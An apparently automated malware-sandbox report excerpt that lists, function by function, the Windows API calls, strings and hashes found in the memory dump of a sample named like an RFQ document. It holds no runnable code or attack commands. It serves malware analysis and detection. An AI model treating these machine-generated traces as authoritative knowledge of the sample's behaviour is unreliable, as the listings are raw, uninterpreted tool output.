                                              • ScreenToClient.USER32(00000000), ref: 0013ACCE
                                              • GetClassNameW.USER32(?,?,00000100), ref: 0013AD48
                                              • _wcscmp.LIBCMT ref: 0013AD5C
                                              • GetWindowTextW.USER32(?,?,00000400), ref: 0013AD82
                                              • _wcscmp.LIBCMT ref: 0013AD96
                                                • Part of subcall function 0010386C: _iswctype.LIBCMT ref: 00103874
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                              • String ID: %s%u
                                              • API String ID: 3744389584-679674701
                                              • Opcode ID: 0a45037661b1b258e1f8c038235356335ea3546689e4e6732c29b8e7e2d095d7
                                              • Instruction ID: c32cf9951d78dafe2144a773e86c44d2ece7736b904fab4e97f70d4956b60772
                                              • Opcode Fuzzy Hash: 0a45037661b1b258e1f8c038235356335ea3546689e4e6732c29b8e7e2d095d7
                                              • Instruction Fuzzy Hash: EBA1CD71204306AFDB18DF64C884BAAF7E8FF04315F408629F9E9D2590DB30E955CBA2
                                              Function 0013B397 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetClassNameW.USER32(00000008,?,00000400), ref: 0013B3DB
                                              • _wcscmp.LIBCMT ref: 0013B3EC
                                              • GetWindowTextW.USER32(00000001,?,00000400), ref: 0013B414
                                              • CharUpperBuffW.USER32(?,00000000), ref: 0013B431
                                              • _wcscmp.LIBCMT ref: 0013B44F
                                              • _wcsstr.LIBCMT ref: 0013B460
                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 0013B498
                                              • _wcscmp.LIBCMT ref: 0013B4A8
                                              • GetWindowTextW.USER32(00000002,?,00000400), ref: 0013B4CF
                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 0013B518
                                              • _wcscmp.LIBCMT ref: 0013B528
                                              • GetClassNameW.USER32(00000010,?,00000400), ref: 0013B550
                                              • GetWindowRect.USER32(00000004,?), ref: 0013B5B9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                              • String ID: @$ThumbnailClass
                                              • API String ID: 1788623398-1539354611
                                              • Opcode ID: d7b2dfb2c1cf6ba9c841e5cae7112fae86d54fe230a1a6e4403042884db70041
                                              • Instruction ID: 48e216f0768b92b477850bbc83e939c3da1e8d5158708d563bbac22241d472f3
                                              • Opcode Fuzzy Hash: d7b2dfb2c1cf6ba9c841e5cae7112fae86d54fe230a1a6e4403042884db70041
                                              • Instruction Fuzzy Hash: C9818E710083059BDB15DF10D8C5FAA7BE8EF54314F08856DFE899A092EB70DE46CBA1
                                              Function 0016A428 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 205windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _memset.LIBCMT ref: 0016A4C8
                                              • DestroyWindow.USER32(?,?), ref: 0016A542
                                                • Part of subcall function 000E7D2C: _memmove.LIBCMT ref: 000E7D66
                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0016A5BC
                                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0016A5DE
                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0016A5F1
                                              • DestroyWindow.USER32(00000000), ref: 0016A613
                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,000E0000,00000000), ref: 0016A64A
                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0016A663
                                              • GetDesktopWindow.USER32 ref: 0016A67C
                                              • GetWindowRect.USER32(00000000), ref: 0016A683
                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0016A69B
                                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0016A6B3
                                                • Part of subcall function 000E25DB: GetWindowLongW.USER32(?,000000EB), ref: 000E25EC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                              • String ID: 0$@U=u$tooltips_class32
                                              • API String ID: 1297703922-1130792468
                                              • Opcode ID: bc9156b5d75d801c97ef11779215d43c8c2216b3d91e313ee348b69a8dad9fcc
                                              • Instruction ID: 0f154057e69b7d633c51ce120e0b099eddcb32f5c7c68e2c845d434666f0b09d
                                              • Opcode Fuzzy Hash: bc9156b5d75d801c97ef11779215d43c8c2216b3d91e313ee348b69a8dad9fcc
                                              • Instruction Fuzzy Hash: DD718971144245AFD720CF28DC49FAA7BE9EF89700F48452CF995A72A1C7B4E962CF12
                                              Function 0016C8EE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000E2612: GetWindowLongW.USER32(?,000000EB), ref: 000E2623
                                              • DragQueryPoint.SHELL32(?,?), ref: 0016C917
                                                • Part of subcall function 0016ADF1: ClientToScreen.USER32(?,?), ref: 0016AE1A
                                                • Part of subcall function 0016ADF1: GetWindowRect.USER32(?,?), ref: 0016AE90
                                                • Part of subcall function 0016ADF1: PtInRect.USER32(?,?,0016C304), ref: 0016AEA0
                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0016C980
                                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0016C98B
                                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0016C9AE
                                              • _wcscat.LIBCMT ref: 0016C9DE
                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0016C9F5
                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0016CA0E
                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 0016CA25
                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 0016CA47
                                              • DragFinish.SHELL32(?), ref: 0016CA4E
                                              • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0016CB41
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$@U=u
                                              • API String ID: 169749273-762882726
                                              • Opcode ID: c1e479065ad92ec378940a64f1ce5c093daac1f34767e6e08c6c8fab8543c329
                                              • Instruction ID: e4397e24b63e68eb8ce36c765f01b93ad29a00c4818b1e872e05e4e406d34603
                                              • Opcode Fuzzy Hash: c1e479065ad92ec378940a64f1ce5c093daac1f34767e6e08c6c8fab8543c329
                                              • Instruction Fuzzy Hash: 34617C71108340AFC701DF65DC85DAFBBE8FF89750F04092EF5A5A21A1DB709A49CBA2
                                              Function 0013B1E0 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: __wcsnicmp
                                              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                              • API String ID: 1038674560-1810252412
                                              • Opcode ID: a245f6e8c97d5f1df2baa157fcc4f33760c90566712634cd4c16cceb96978eb8
                                              • Instruction ID: fc699c7738a3ccafbcdbf9eaa98e9dd67a58b236dbd9cf4cbdc2fd87801732b7
                                              • Opcode Fuzzy Hash: a245f6e8c97d5f1df2baa157fcc4f33760c90566712634cd4c16cceb96978eb8
                                              • Instruction Fuzzy Hash: 2D31A131A08245AADF18FAA5CD83EEEB7A89F24750F60012DF555720E2FFA16E04C651
                                              Function 00164619 Relevance: 24.8, APIs: 2, Strings: 12, Instructions: 251windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CharUpperBuffW.USER32(?,?), ref: 001646AB
                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 001646F6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: BuffCharMessageSendUpper
                                              • String ID: @U=u$CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                              • API String ID: 3974292440-383632319
                                              • Opcode ID: f5b6e8ebe2ff433be7d6e9af6ba1a9c87ee22e23b7dbf387771b87dcb53b0d04
                                              • Instruction ID: cc192f433cab4f8e583a79aec551d0f47396c3cf92af77e13327a59aaafec673
                                              • Opcode Fuzzy Hash: f5b6e8ebe2ff433be7d6e9af6ba1a9c87ee22e23b7dbf387771b87dcb53b0d04
                                              • Instruction Fuzzy Hash: B791A1742083419FCB14EF54C951A6EB7A1AFA8314F04846CF8D66B7A3CB70ED5ACB91
                                              Function 0016BAB8 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 197windowlibraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0016BB6E
                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00166D80,?), ref: 0016BBCA
                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0016BC03
                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0016BC46
                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0016BC7D
                                              • FreeLibrary.KERNEL32(?), ref: 0016BC89
                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0016BC99
                                              • DestroyIcon.USER32(?), ref: 0016BCA8
                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0016BCC5
                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0016BCD1
                                                • Part of subcall function 0010313D: __wcsicmp_l.LIBCMT ref: 001031C6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                              • String ID: .dll$.exe$.icl$@U=u
                                              • API String ID: 1212759294-1639919054
                                              • Opcode ID: e0359c2c2b022eff99e46e4d911326e3dd2d1bc14cbd849a82568f1c8616ff2b
                                              • Instruction ID: b979270c9153ea0b5913348ba293a7f6f91b3cdf2d23acca17ca97930a6754c3
                                              • Opcode Fuzzy Hash: e0359c2c2b022eff99e46e4d911326e3dd2d1bc14cbd849a82568f1c8616ff2b
                                              • Instruction Fuzzy Hash: 0661D071504219BEEB14DF64DC85FBE77A8FB08710F10821AF915D61D1DBB4AAA0DBA0
                                              Function 0014A5BD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000E9997: __itow.LIBCMT ref: 000E99C2
                                                • Part of subcall function 000E9997: __swprintf.LIBCMT ref: 000E9A0C
                                              • CharLowerBuffW.USER32(?,?), ref: 0014A636
                                              • GetDriveTypeW.KERNEL32 ref: 0014A683
                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0014A6CB
                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0014A702
                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0014A730
                                                • Part of subcall function 000E7D2C: _memmove.LIBCMT ref: 000E7D66
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                              • API String ID: 2698844021-4113822522
                                              • Opcode ID: 189655907a8fd17a56b66b6b0554446bc7e76f319ac6a20509e6a423c91ac671
                                              • Instruction ID: d0c61f2a976a6c807f39ec367a776cf5a43d8028ba32393b694cdc6380a6b1f8
                                              • Opcode Fuzzy Hash: 189655907a8fd17a56b66b6b0554446bc7e76f319ac6a20509e6a423c91ac671
                                              • Instruction Fuzzy Hash: 705170711083459FC700EF11C9919AAB7F4FF98718F54496CF89967262DB31EE0ACB92
                                              Function 0014A45A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0014A47A
                                              • __swprintf.LIBCMT ref: 0014A49C
                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 0014A4D9
                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0014A4FE
                                              • _memset.LIBCMT ref: 0014A51D
                                              • _wcsncpy.LIBCMT ref: 0014A559
                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0014A58E
                                              • CloseHandle.KERNEL32(00000000), ref: 0014A599
                                              • RemoveDirectoryW.KERNEL32(?), ref: 0014A5A2
                                              • CloseHandle.KERNEL32(00000000), ref: 0014A5AC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                              • String ID: :$\$\??\%s
                                              • API String ID: 2733774712-3457252023
                                              • Opcode ID: 00bb61f27b78749cf934c29f13aa2b4481d33a7a3b46c6297ab0ab58ca88e61c
                                              • Instruction ID: e572e3cef2d040ebb83edc3e8945fa6665c4c160680ee2e458f805c632240809
                                              • Opcode Fuzzy Hash: 00bb61f27b78749cf934c29f13aa2b4481d33a7a3b46c6297ab0ab58ca88e61c
                                              • Instruction Fuzzy Hash: 6131B2B5540209ABDB209FA0DC48FEB73BCEF88701F5441BAFA08D6160E7B096858B25
                                              Function 0016C49C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000E2612: GetWindowLongW.USER32(?,000000EB), ref: 000E2623
                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0016C4EC
                                              • GetFocus.USER32 ref: 0016C4FC
                                              • GetDlgCtrlID.USER32(00000000), ref: 0016C507
                                              • _memset.LIBCMT ref: 0016C632
                                              • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0016C65D
                                              • GetMenuItemCount.USER32(?), ref: 0016C67D
                                              • GetMenuItemID.USER32(?,00000000), ref: 0016C690
                                              • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0016C6C4
                                              • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0016C70C
                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0016C744
                                              • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0016C779
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                              • String ID: 0
                                              • API String ID: 1296962147-4108050209
                                              • Opcode ID: e0671936d1418007f8de43e03ec5e218ca67797e665f57139c6fc1fc484878ec
                                              • Instruction ID: 1806bd74b83a789d4655fe6dba9ae9a4570f197509af76660a14342bb00a5494
                                              • Opcode Fuzzy Hash: e0671936d1418007f8de43e03ec5e218ca67797e665f57139c6fc1fc484878ec
                                              • Instruction Fuzzy Hash: 25816A71208341AFD710CF24DD84ABBBBE8FB98314F04492DF99697291D770E965CBA2
                                              Function 001383F4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0013874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00138766
                                                • Part of subcall function 0013874A: GetLastError.KERNEL32(?,0013822A,?,?,?), ref: 00138770
                                                • Part of subcall function 0013874A: GetProcessHeap.KERNEL32(00000008,?,?,0013822A,?,?,?), ref: 0013877F
                                                • Part of subcall function 0013874A: HeapAlloc.KERNEL32(00000000,?,0013822A,?,?,?), ref: 00138786
                                                • Part of subcall function 0013874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0013879D
                                                • Part of subcall function 001387E7: GetProcessHeap.KERNEL32(00000008,00138240,00000000,00000000,?,00138240,?), ref: 001387F3
                                                • Part of subcall function 001387E7: HeapAlloc.KERNEL32(00000000,?,00138240,?), ref: 001387FA
                                                • Part of subcall function 001387E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00138240,?), ref: 0013880B
                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00138458
                                              • _memset.LIBCMT ref: 0013846D
                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0013848C
                                              • GetLengthSid.ADVAPI32(?), ref: 0013849D
                                              • GetAce.ADVAPI32(?,00000000,?), ref: 001384DA
                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 001384F6
                                              • GetLengthSid.ADVAPI32(?), ref: 00138513
                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00138522
                                              • HeapAlloc.KERNEL32(00000000), ref: 00138529
                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0013854A
                                              • CopySid.ADVAPI32(00000000), ref: 00138551
                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00138582
                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 001385A8
                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 001385BC
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                              • String ID:
                                              • API String ID: 3996160137-0
                                              • Opcode ID: e36f0d6f3305653c7ed9cd711c56df0d4566b49f731fc9142b3cec4b073f3833
                                              • Instruction ID: 3a59f3f3dea89527ad092490c8574ee380bc5362263be5fd6359194f079a9ce8
                                              • Opcode Fuzzy Hash: e36f0d6f3305653c7ed9cd711c56df0d4566b49f731fc9142b3cec4b073f3833
                                              • Instruction Fuzzy Hash: B561357190020AEBDF00DFA5EC45AEEBBB9FF44300F148269F915A7291DB719A45CF60
                                              Function 0015762D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDC.USER32(00000000), ref: 001576A2
                                              • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 001576AE
                                              • CreateCompatibleDC.GDI32(?), ref: 001576BA
                                              • SelectObject.GDI32(00000000,?), ref: 001576C7
                                              • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 0015771B
                                              • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00157757
                                              • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 0015777B
                                              • SelectObject.GDI32(00000006,?), ref: 00157783
                                              • DeleteObject.GDI32(?), ref: 0015778C
                                              • DeleteDC.GDI32(00000006), ref: 00157793
                                              • ReleaseDC.USER32(00000000,?), ref: 0015779E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                              • String ID: (
                                              • API String ID: 2598888154-3887548279
                                              • Opcode ID: e9f59e152a7e6e69e88a6a9fedc59f261ef9b5ae621f88ad37a453c82367e9d8
                                              • Instruction ID: 960da5f8a2535431cf98eb915a79855d22fdaf730b5d445dc2898bc2984a1028
                                              • Opcode Fuzzy Hash: e9f59e152a7e6e69e88a6a9fedc59f261ef9b5ae621f88ad37a453c82367e9d8
                                              • Instruction Fuzzy Hash: 34518975904209EFDB15CFA8EC89EAEBBB9EF48310F10842DF95997250D771A845CB60
                                              Function 0014A0B5 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadStringW.USER32(00000066,?,00000FFF,0016FB78), ref: 0014A0FC
                                                • Part of subcall function 000E7F41: _memmove.LIBCMT ref: 000E7F82
                                              • LoadStringW.USER32(?,?,00000FFF,?), ref: 0014A11E
                                              • __swprintf.LIBCMT ref: 0014A177
